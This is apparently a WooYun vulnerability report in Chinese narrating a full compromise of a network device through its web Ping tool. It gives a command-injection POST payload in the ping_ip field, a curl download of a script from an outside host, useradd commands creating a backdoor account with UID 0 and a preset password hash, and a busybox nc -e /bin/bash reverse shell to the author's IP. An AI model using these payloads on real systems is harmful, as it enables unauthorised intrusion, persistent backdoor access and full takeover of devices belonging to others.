WooYun.org

命令执行方法POC:
http://10.X.X.73/func/web_main/display/net_tool/Ping
POST:
vrflist=0&ping_parameters=&ping_ip=0||ls -al ./

设备开启了telnet,用默认登录用户可登录，但是终端却是预定义命令的环境，虽然也可以执行很多的功能了，但是不得到控制整个设备的权限还是不爽啊！

查看设备信息：

我开始的想法是写个WEBSHELL。。
但是后面尝试了很久，不支持常见脚本，看了配置文件以后，就放弃了（貌似cgi脚本）。
这条路死了。
很多命令都被删除了，wget，幸亏还有Curl还能用。。
写了个加用户的脚本丢上去，通过Curl去下载。
curl -o z.sh http://xxx/z.sh
加用户命令：

useradd -p \$1\$adminx\$j.GPEDH1kTqGmwJOvdVVt0 -o -u 0 -g root -G root -s /bin/sh -d /home/adminx adminx

其实后面知道了是不允许ROOT权限的用户直接远程登录的.(后面反弹shell看了下配置文件)
死活登录不上。。
后面：
所以加了个：

useradd -p \$1\$adminx\$j.GPEDH1kTqGmwJOvdVVt0 -o -u 1103 -g root -G root -s /bin/bash -d /home/adminx adminx

然后去登录，依然是预定义命令的终端，改/bin/sh还是没用.
然后这条路就也死了。
后面看了下环境。
无GCC,PYTHON,PERL。。。netcat也没得。。

现在情况(你不能修改或者删除设备上的配置文件什么的):
写SHELL太困难；
用现有帐号或者新增帐号telnet登录（预定义终端）；
很多工具都被阉割掉了，或者根本就一直没得；
中间纠结了很久，也开了BT5然后找一些命令，尝试使用绝对路径去访问一些东西。。
还想写个shell脚本，安装一些环境，或者安装个netcat，反弹个SHELL回来。
当我在/bin下面看见了busybox的时候，突然感觉了一些希望，这玩意可以内置支持了不少工具。。
运行看了下：

发现里面支持nc.
支持nc的话，我们就很大可能可以反弹SHELL。。
执行看看。

支持"-e"参数，这样感觉就简单了，测试了几次，拿到下面的姿势：

/bin/busybox nc 10.10.10.10 2005 -e /bin/bash

10.10.10.10是我的IP，2005是我监听的端口号。
现在成功拿到了一个交互式的Shell(总算可以自己想干啥干啥)..